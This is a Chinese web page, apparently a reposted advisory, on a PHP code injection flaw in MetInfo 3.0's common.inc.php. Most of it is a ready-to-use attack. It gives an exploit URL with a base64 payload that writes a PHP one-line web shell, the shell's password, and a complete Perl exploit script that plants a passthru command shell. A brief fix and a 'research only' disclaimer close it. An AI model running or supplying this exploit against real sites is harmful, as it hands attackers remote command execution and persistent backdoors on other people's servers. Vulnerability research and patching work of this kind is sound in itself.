好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

MetInfo 3.0 PHP代码注入漏洞及修复 - 网站安全 - 自

影响版本: MetInfo 3.0

漏洞 描述: MetInfo企业网站管理系统是一个功能完善的营销型企业网站管理平台, PHP +MYSQL架构

MetInfo 3.0的/include/common.inc.php文件第67行: eval(base64_decode($allclass[0])); $allclass[0]变量未初始化,因此我们可以控制其值,进行代码注入的利用。<*参考 HdhCmsTestlinux520测试数据 *> 测试

本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负! http://victim测试数据/include/common.inc.php?allclass[0]=ZnB1dHMoZm9wZW4oJy4uL3RlbXBsYXRlcy90ZXN0LnBocCcsJ3crJyksJzw/

cGhwIGV2YWwoJF9QT1NUW2NdKTs/PicpOw==

base64编码部分是 fputs(fopen(templates/test.php,w+),<?php eval($_POST[c]);?>);

一句话后门: http://victim测试数据/templates/test.php 密码c

=========== #!/usr/bin/env perl   use L WP ::UserAgent; print "################################################################ "; print "#              MetInfo 3.0 c0de inj3cti0n 3xplo!t              # "; print "#                         by:linux520测试数据                      # "; print "################################################################ ";   die "Usage: $0 <target site> Ex:$0 victim测试数据 " unless($ARGV[0]); my $victim = $ARGV[0]; $user_agent = new LWP::UserAgent; $vul_request = new HTTP::Request(GET," http://$victim/include/common.inc.php?allclass[0]=ZnB1dHMoZm9wZW4oJy4uL3RlbXBsYXRlcy90ZXN0LnBocCcsJ3crJyksJzw/

cGhwIHBhc3N0aHJ1KCRfR0VUW2NtZF0pPz4nKTs="); # fputs(fopen(templates/test.php,w+),<?php passthru($_GET[cmd]);?>); $user_agent->request($vul_request); $response = $user_agent->request(new HTTP::Request(GET," http://$victim/templates/test.php ")); if($response->is_success) {     print "code injection successful ! plz look at http://$victim/templates/test.php?cmd=id "; } else { print "could not connect to $victim"; } ####################################################################################

临时解决方案: 对$allclass[0]变量进行初始化

查看更多关于MetInfo 3.0 PHP代码注入漏洞及修复 - 网站安全 - 自的详细内容...

  阅读:49次